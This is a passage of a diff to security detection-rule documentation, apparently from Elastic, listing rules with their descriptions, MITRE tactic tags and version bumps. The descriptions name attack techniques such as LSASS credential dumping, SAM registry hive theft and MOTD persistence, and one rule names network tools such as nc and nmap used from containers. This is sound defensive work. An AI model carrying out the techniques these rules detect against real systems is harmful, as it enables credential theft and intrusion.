adversary can establish persistence by installing a new logon item, launch agent, or daemon that executes upon login. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 -|<<suspicious-image-load-taskschd-dll-from-ms-office, Suspicious Image Load (taskschd.dll) from MS Office>> |Identifies a suspicious image load (taskschd.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where a scheduled task is configured via Windows Component Object Model (COM). This technique can be used to configure persistence and evade monitoring by avoiding the usage of the traditional Windows binary (schtasks.exe) used to manage scheduled tasks. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<suspicious-image-load-taskschd-dll-from-ms-office, Suspicious Image Load (taskschd.dll) from MS Office>> |Identifies a suspicious image load (taskschd.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where a scheduled task is configured via Windows Component Object Model (COM). This technique can be used to configure persistence and evade monitoring by avoiding the usage of the traditional Windows binary (schtasks.exe) used to manage scheduled tasks. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 -|<<suspicious-imagepath-service-creation, Suspicious ImagePath Service Creation>> |Identifies the creation of a suspicious ImagePath value. This could be an indication of an adversary attempting to stealthily persist or escalate privileges through abnormal service creation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<suspicious-imagepath-service-creation, Suspicious ImagePath Service Creation>> |Identifies the creation of a suspicious ImagePath value. This could be an indication of an adversary attempting to stealthily persist or escalate privileges through abnormal service creation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 |<<suspicious-inter-process-communication-via-outlook, Suspicious Inter-Process Communication via Outlook>> |Detects Inter-Process Communication with Outlook via Component Object Model from an unusual process. Adversaries may target user email to collect sensitive information or send email on their behalf via API. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: Elastic Defend] |8.4.0 |4 |<<suspicious-interactive-shell-spawned-from-inside-a-container, Suspicious Interactive Shell Spawned From Inside A Container>> |This rule detects when an interactive shell is spawned inside a running container. This could indicate a potential container breakout attempt or an attacker's attempt to gain unauthorized access to the underlying host. |[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution] |8.8.0 |2 -|<<suspicious-java-child-process, Suspicious JAVA Child Process>> |Identifies suspicious child processes of the Java interpreter process. This may indicate an attempt to execute a malicious JAR file or an exploitation attempt via a JAVA specific vulnerability. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |105 +|<<suspicious-java-child-process, Suspicious JAVA Child Process>> |Identifies suspicious child processes of the Java interpreter process. This may indicate an attempt to execute a malicious JAR file or an exploitation attempt via a JAVA specific vulnerability. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.6.0 |205 |<<suspicious-lsass-access-via-malseclogon, Suspicious LSASS Access via MalSecLogon>> |Identifies suspicious access to LSASS handle from a call trace pointing to seclogon.dll and with a suspicious access rights value. This may indicate an attempt to leak an LSASS handle via abusing the Secondary Logon service in preparation for credential access. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Sysmon Only] |8.8.0 |206 |<<suspicious-lsass-process-access, Suspicious Lsass Process Access>> |Identifies access attempts to LSASS handle, this may indicate an attempt to dump credentials from Lsass memory. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Sysmon Only] |8.8.0 |105 -|<<suspicious-ms-office-child-process, Suspicious MS Office Child Process>> |Identifies suspicious child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, Excel). These child processes are often launched during exploitation of Office applications or from documents with malicious macros. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<suspicious-ms-office-child-process, Suspicious MS Office Child Process>> |Identifies suspicious child processes of frequently targeted Microsoft Office applications (Word, PowerPoint, Excel). These child processes are often launched during exploitation of Office applications or from documents with malicious macros. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 -|<<suspicious-ms-outlook-child-process, Suspicious MS Outlook Child Process>> |Identifies suspicious child processes of Microsoft Outlook. These child processes are often associated with spear phishing activity. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<suspicious-ms-outlook-child-process, Suspicious MS Outlook Child Process>> |Identifies suspicious child processes of Microsoft Outlook. These child processes are often associated with spear phishing activity. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<suspicious-managed-code-hosting-process, Suspicious Managed Code Hosting Process>> |Identifies a suspicious managed code hosting process which could indicate code injection or other form of suspicious code execution. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 +|<<suspicious-managed-code-hosting-process, Suspicious Managed Code Hosting Process>> |Identifies a suspicious managed code hosting process which could indicate code injection or other form of suspicious code execution. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |105 |<<suspicious-microsoft-365-mail-access-by-clientappid, Suspicious Microsoft 365 Mail Access by ClientAppId>> |Identifies when a Microsoft 365 Mailbox is accessed by a ClientAppId that was observed for the fist time during the last 10 days. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Configuration Audit], [Tactic: Initial Access] |8.6.0 |1 |<<suspicious-microsoft-diagnostics-wizard-execution, Suspicious Microsoft Diagnostics Wizard Execution>> |Identifies potential abuse of the Microsoft Diagnostics Troubleshooting Wizard (MSDT) to proxy malicious command or binary execution via malicious process arguments. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<suspicious-mining-process-creation-event, Suspicious Mining Process Creation Event>> |Identifies service creation events of common mining services, possibly indicating the infection of a system with a cryptominer. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |3 +|<<suspicious-mining-process-creation-event, Suspicious Mining Process Creation Event>> |Identifies service creation events of common mining services, possibly indicating the infection of a system with a cryptominer. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |4 -|<<suspicious-modprobe-file-event, Suspicious Modprobe File Event>> |Detects file events involving kernel modules in modprobe configuration files, which may indicate unauthorized access or manipulation of critical kernel modules. Attackers may tamper with the modprobe files to load malicious or unauthorized kernel modules, potentially bypassing security measures, escalating privileges, or hiding their activities within the system. |[OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR] |8.3.0 |3 +|<<suspicious-modprobe-file-event, Suspicious Modprobe File Event>> |Detects file events involving kernel modules in modprobe configuration files, which may indicate unauthorized access or manipulation of critical kernel modules. Attackers may tamper with the modprobe files to load malicious or unauthorized kernel modules, potentially bypassing security measures, escalating privileges, or hiding their activities within the system. |[OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR] |8.6.0 |103 |<<suspicious-module-loaded-by-lsass, Suspicious Module Loaded by LSASS>> |Identifies LSASS loading an unsigned or untrusted DLL. Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |4 -|<<suspicious-network-activity-to-the-internet-by-previously-unknown-executable, Suspicious Network Activity to the Internet by Previously Unknown Executable>> |This rule monitors for network connectivity to the internet from a previously unknown executable located in a suspicious directory to a previously unknown destination ip. An alert from this rule can indicate the presence of potentially malicious activity, such as the execution of unauthorized or suspicious processes attempting to establish connections to unknown or suspicious destinations such as a command and control server. Detecting and investigating such behavior can help identify and mitigate potential security threats, protecting the system and its data from potential compromise. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |3 +|<<suspicious-network-activity-to-the-internet-by-previously-unknown-executable, Suspicious Network Activity to the Internet by Previously Unknown Executable>> |This rule monitors for network connectivity to the internet from a previously unknown executable located in a suspicious directory to a previously unknown destination ip. An alert from this rule can indicate the presence of potentially malicious activity, such as the execution of unauthorized or suspicious processes attempting to establish connections to unknown or suspicious destinations such as a command and control server. Detecting and investigating such behavior can help identify and mitigate potential security threats, protecting the system and its data from potential compromise. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |4 |<<suspicious-network-tool-launched-inside-a-container, Suspicious Network Tool Launched Inside A Container>> |This rule detects commonly abused network utilities running inside a container. Network utilities like nc, nmap, dig, tcpdump, ngrep, telnet, mitmproxy, zmap can be used for malicious purposes such as network reconnaissance, monitoring, or exploitation, and should be monitored closely within a container. |[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Command and Control], [Tactic: Reconnaissance] |8.8.0 |2 -|<<suspicious-pdf-reader-child-process, Suspicious PDF Reader Child Process>> |Identifies suspicious child processes of PDF reader applications. These child processes are often launched via exploitation of PDF applications or social engineering. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<suspicious-pdf-reader-child-process, Suspicious PDF Reader Child Process>> |Identifies suspicious child processes of PDF reader applications. These child processes are often launched via exploitation of PDF applications or social engineering. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Initial Access], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<suspicious-portable-executable-encoded-in-powershell-script, Suspicious Portable Executable Encoded in Powershell Script>> |Detects the presence of a portable executable (PE) in a PowerShell script by looking for its encoded header. Attackers embed PEs into PowerShell scripts to inject them into memory, avoiding defences by not writing to disk. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |107 +|<<suspicious-portable-executable-encoded-in-powershell-script, Suspicious Portable Executable Encoded in Powershell Script>> |Detects the presence of a portable executable (PE) in a PowerShell script by looking for its encoded header. Attackers embed PEs into PowerShell scripts to inject them into memory, avoiding defences by not writing to disk. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |108 |<<suspicious-powershell-engine-imageload, Suspicious PowerShell Engine ImageLoad>> |Identifies the PowerShell engine being invoked by unexpected processes. Rather than executing PowerShell functionality with powershell.exe, some attackers do this to operate more stealthily. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |208 @@ -1630,67 +1690,75 @@ and their rule type is `machine_learning`. |<<suspicious-printspooler-service-executable-file-creation, Suspicious PrintSpooler Service Executable File Creation>> |Detects attempts to exploit privilege escalation vulnerabilities related to the Print Spooler service. For more information refer to the following CVE's - CVE-2020-1048, CVE-2020-1337 and CVE-2020-1300 and verify that the impacted system is patched. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Endgame], [Use Case: Vulnerability], [Data Source: Elastic Defend] |8.3.0 |104 -|<<suspicious-proc-pseudo-file-system-enumeration, Suspicious Proc Pseudo File System Enumeration>> |This rule monitors for a rapid enumeration of 25 different proc cmd, stat, and exe files, which suggests an abnormal activity pattern. Such behavior could be an indicator of a malicious process scanning or gathering information about running processes, potentially for reconnaissance, privilege escalation, or identifying vulnerable targets. |[OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR] |8.3.0 |3 +|<<suspicious-proc-pseudo-file-system-enumeration, Suspicious Proc Pseudo File System Enumeration>> |This rule monitors for a rapid enumeration of 25 different proc cmd, stat, and exe files, which suggests an abnormal activity pattern. Such behavior could be an indicator of a malicious process scanning or gathering information about running processes, potentially for reconnaissance, privilege escalation, or identifying vulnerable targets. |[OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR] |8.3.0 |4 -|<<suspicious-process-access-via-direct-system-call, Suspicious Process Access via Direct System Call>> |Identifies suspicious process access events from an unknown memory region. Endpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Sysmon Only] |8.8.0 |208 +|<<suspicious-process-access-via-direct-system-call, Suspicious Process Access via Direct System Call>> |Identifies suspicious process access events from an unknown memory region. Endpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Sysmon Only] |8.8.0 |209 |<<suspicious-process-creation-calltrace, Suspicious Process Creation CallTrace>> |Identifies when a process is created and immediately accessed from an unknown memory code region and by the same parent process. This may indicate a code injection attempt. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Sysmon Only] |8.8.0 |207 -|<<suspicious-process-execution-via-renamed-psexec-executable, Suspicious Process Execution via Renamed PsExec Executable>> |Identifies suspicious psexec activity which is executing from the psexec service that has been renamed, possibly to evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 +|<<suspicious-process-execution-via-renamed-psexec-executable, Suspicious Process Execution via Renamed PsExec Executable>> |Identifies suspicious psexec activity which is executing from the psexec service that has been renamed, possibly to evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 -|<<suspicious-process-spawned-from-motd-detected, Suspicious Process Spawned from MOTD Detected>> |Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the "/etc/update-motd.d/" and "/usr/lib/update-notifier/" directories. These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. This rule detects the execution of potentially malicious processes through the MOTD utility. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |5 +|<<suspicious-process-spawned-from-motd-detected, Suspicious Process Spawned from MOTD Detected>> |Message of the day (MOTD) is the message that is presented to the user when a user connects to a Linux server via SSH or a serial connection. Linux systems contain several default MOTD files located in the "/etc/update-motd.d/" and "/usr/lib/update-notifier/" directories. These scripts run as the root user every time a user connects over SSH or a serial connection. Adversaries may create malicious MOTD files that grant them persistence onto the target every time a user connects to the system by executing a backdoor script or command. This rule detects the execution of potentially malicious processes through the MOTD utility. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |6 -|<<suspicious-rdp-activex-client-loaded, Suspicious RDP ActiveX Client Loaded>> |Identifies suspicious Image Loading of the Remote Desktop Services ActiveX Client (mstscax), this may indicate the presence of RDP lateral movement capability. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |104 +|<<suspicious-rdp-activex-client-loaded, Suspicious RDP ActiveX Client Loaded>> |Identifies suspicious Image Loading of the Remote Desktop Services ActiveX Client (mstscax), this may indicate the presence of RDP lateral movement capability. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 -|<<suspicious-remote-registry-access-via-sebackupprivilege, Suspicious Remote Registry Access via SeBackupPrivilege>> |Identifies remote access to the registry using an account with Backup Operators group membership. This may indicate an attempt to exfiltrate credentials by dumping the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Credential Access], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring], [Data Source: Active Directory] |8.3.0 |107 +|<<suspicious-remote-registry-access-via-sebackupprivilege, Suspicious Remote Registry Access via SeBackupPrivilege>> |Identifies remote access to the registry using an account with Backup Operators group membership. This may indicate an attempt to exfiltrate credentials by dumping the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Tactic: Credential Access], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring], [Data Source: Active Directory] |8.3.0 |108 -|<<suspicious-renaming-of-esxi-files, Suspicious Renaming of ESXI Files>> |Identifies instances where VMware-related files, such as those with extensions like ".vmdk", ".vmx", ".vmxf", ".vmsd", ".vmsn", ".vswp", ".vmss", ".nvram", and ".vmem", are renamed on a Linux system. The rule monitors for the "rename" event action associated with these file types, which could indicate malicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.5.0 |3 +|<<suspicious-renaming-of-esxi-files, Suspicious Renaming of ESXI Files>> |Identifies instances where VMware-related files, such as those with extensions like ".vmdk", ".vmx", ".vmxf", ".vmsd", ".vmsn", ".vswp", ".vmss", ".nvram", and ".vmem", are renamed on a Linux system. The rule monitors for the "rename" event action associated with these file types, which could indicate malicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.5.0 |4 -|<<suspicious-renaming-of-esxi-index-html-file, Suspicious Renaming of ESXI index.html File>> |Identifies instances where the "index.html" file within the "/usr/lib/vmware/*" directory is renamed on a Linux system. The rule monitors for the "rename" event action associated with this specific file and path, which could indicate malicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.5.0 |3 +|<<suspicious-renaming-of-esxi-index-html-file, Suspicious Renaming of ESXI index.html File>> |Identifies instances where the "index.html" file within the "/usr/lib/vmware/*" directory is renamed on a Linux system. The rule monitors for the "rename" event action associated with this specific file and path, which could indicate malicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.5.0 |4 -|<<suspicious-script-object-execution, Suspicious Script Object Execution>> |Identifies scrobj.dll loaded into unusual Microsoft processes. This usually means a malicious scriptlet is being executed in the target process. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 +|<<suspicious-script-object-execution, Suspicious Script Object Execution>> |Identifies scrobj.dll loaded into unusual Microsoft processes. This usually means a malicious scriptlet is being executed in the target process. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |105 |<<suspicious-service-was-installed-in-the-system, Suspicious Service was Installed in the System>> |Identifies the creation of a new Windows service with suspicious Service command values. Windows services typically run as SYSTEM and can be used for privilege escalation and persistence. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide] |8.3.0 |8 |<<suspicious-solarwinds-child-process, Suspicious SolarWinds Child Process>> |A suspicious SolarWinds child process was detected, which may indicate an attempt to execute malicious programs. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<suspicious-startup-shell-folder-modification, Suspicious Startup Shell Folder Modification>> |Identifies suspicious startup shell folder modifications to change the default Startup directory in order to bypass detections monitoring file creation in the Windows Startup folder. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<suspicious-startup-shell-folder-modification, Suspicious Startup Shell Folder Modification>> |Identifies suspicious startup shell folder modifications to change the default Startup directory in order to bypass detections monitoring file creation in the Windows Startup folder. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 + +|<<suspicious-symbolic-link-created, Suspicious Symbolic Link Created>> |Identifies the creation of a symbolic link to a suspicious file or location. A symbolic link is a reference to a file or directory that acts as a pointer or shortcut, allowing users to access the target file or directory from a different location in the file system. An attacker can potentially leverage symbolic links for privilege escalation by tricking a privileged process into following the symbolic link to a sensitive file, giving the attacker access to data or capabilities they would not normally have. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |3 -|<<suspicious-symbolic-link-created, Suspicious Symbolic Link Created>> |Identifies the creation of a symbolic link to a suspicious file or location. A symbolic link is a reference to a file or directory that acts as a pointer or shortcut, allowing users to access the target file or directory from a different location in the file system. An attacker can potentially leverage symbolic links for privilege escalation by tricking a privileged process into following the symbolic link to a sensitive file, giving the attacker access to data or capabilities they would not normally have. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Credential Access], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |2 +|<<suspicious-sysctl-file-event, Suspicious Sysctl File Event>> |Monitors file events on sysctl configuration files (e.g., /etc/sysctl.conf, /etc/sysctl.d/*.conf) to identify potential unauthorized access or manipulation of system-level configuration settings. Attackers may tamper with the sysctl configuration files to modify kernel parameters, potentially compromising system stability, performance, or security. |[OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR] |8.6.0 |103 -|<<suspicious-sysctl-file-event, Suspicious Sysctl File Event>> |Monitors file events on sysctl configuration files (e.g., /etc/sysctl.conf, /etc/sysctl.d/*.conf) to identify potential unauthorized access or manipulation of system-level configuration settings. Attackers may tamper with the sysctl configuration files to modify kernel parameters, potentially compromising system stability, performance, or security. |[OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR] |8.3.0 |3 +|<<suspicious-system-commands-executed-by-previously-unknown-executable, Suspicious System Commands Executed by Previously Unknown Executable>> |This rule monitors for the execution of several commonly used system commands executed by a previously unknown executable located in commonly abused directories. An alert from this rule can indicate the presence of potentially malicious activity, such as the execution of unauthorized or suspicious processes attempting to run malicious code. Detecting and investigating such behavior can help identify and mitigate potential security threats, protecting the system and its data from potential compromise. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.6.0 |103 -|<<suspicious-system-commands-executed-by-previously-unknown-executable, Suspicious System Commands Executed by Previously Unknown Executable>> |This rule monitors for the execution of several commonly used system commands executed by a previously unknown executable located in commonly abused directories. An alert from this rule can indicate the presence of potentially malicious activity, such as the execution of unauthorized or suspicious processes attempting to run malicious code. Detecting and investigating such behavior can help identify and mitigate potential security threats, protecting the system and its data from potential compromise. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.4.0 |2 +|<<suspicious-termination-of-esxi-process, Suspicious Termination of ESXI Process>> |Identifies instances where VMware processes, such as "vmware-vmx" or "vmx," are terminated on a Linux system by a "kill" command. The rule monitors for the "end" event type, which signifies the termination of a process. The presence of a "kill" command as the parent process for terminating VMware processes may indicate that a threat actor is attempting to interfere with the virtualized environment on the targeted system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Impact], [Data Source: Elastic Defend] |8.5.0 |4 -|<<suspicious-termination-of-esxi-process, Suspicious Termination of ESXI Process>> |Identifies instances where VMware processes, such as "vmware-vmx" or "vmx," are terminated on a Linux system by a "kill" command. The rule monitors for the "end" event type, which signifies the termination of a process. The presence of a "kill" command as the parent process for terminating VMware processes may indicate that a threat actor is attempting to interfere with the virtualized environment on the targeted system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Impact], [Data Source: Elastic Defend] |8.5.0 |3 +|<<suspicious-troubleshooting-pack-cabinet-execution, Suspicious Troubleshooting Pack Cabinet Execution>> |Identifies the execution of the Microsoft Diagnostic Wizard to open a diagcab file from a suspicious path and with an unusual parent process. This may indicate an attempt to execute malicious Troubleshooting Pack Cabinet files. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 -|<<suspicious-utility-launched-via-proxychains, Suspicious Utility Launched via ProxyChains>> |This rule monitors for the execution of suspicious linux tools through ProxyChains. ProxyChains is a command-line tool that enables the routing of network connections through intermediary proxies, enhancing anonymity and enabling access to restricted resources. Attackers can exploit the ProxyChains utility to hide their true source IP address, evade detection, and perform malicious activities through a chain of proxy servers, potentially masking their identity and intentions. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |1 +|<<suspicious-utility-launched-via-proxychains, Suspicious Utility Launched via ProxyChains>> |This rule monitors for the execution of suspicious linux tools through ProxyChains. ProxyChains is a command-line tool that enables the routing of network connections through intermediary proxies, enhancing anonymity and enabling access to restricted resources. Attackers can exploit the ProxyChains utility to hide their true source IP address, evade detection, and perform malicious activities through a chain of proxy servers, potentially masking their identity and intentions. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend] |8.3.0 |2 |<<suspicious-wmi-event-subscription-created, Suspicious WMI Event Subscription Created>> |Detects the creation of a WMI Event Subscription. Attackers can abuse this mechanism for persistence or to elevate to SYSTEM privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Sysmon Only] |8.8.0 |105 |<<suspicious-wmi-image-load-from-ms-office, Suspicious WMI Image Load from MS Office>> |Identifies a suspicious image load (wmiutils.dll) from Microsoft Office processes. This behavior may indicate adversarial activity where child processes are spawned via Windows Management Instrumentation (WMI). This technique can be used to execute code and evade traditional parent/child processes spawned from Microsoft Office products. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 -|<<suspicious-wmic-xsl-script-execution, Suspicious WMIC XSL Script Execution>> |Identifies WMIC allowlist bypass techniques by alerting on suspicious execution of scripts. When WMIC loads scripting libraries it may be indicative of an allowlist bypass. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |105 +|<<suspicious-wmic-xsl-script-execution, Suspicious WMIC XSL Script Execution>> |Identifies WMIC allowlist bypass techniques by alerting on suspicious execution of scripts. When WMIC loads scripting libraries it may be indicative of an allowlist bypass. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |106 -|<<suspicious-werfault-child-process, Suspicious WerFault Child Process>> |A suspicious WerFault child process was detected, which may indicate an attempt to run via the SilentProcessExit registry key manipulation. Verify process details such as command line, network connections and file writes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], 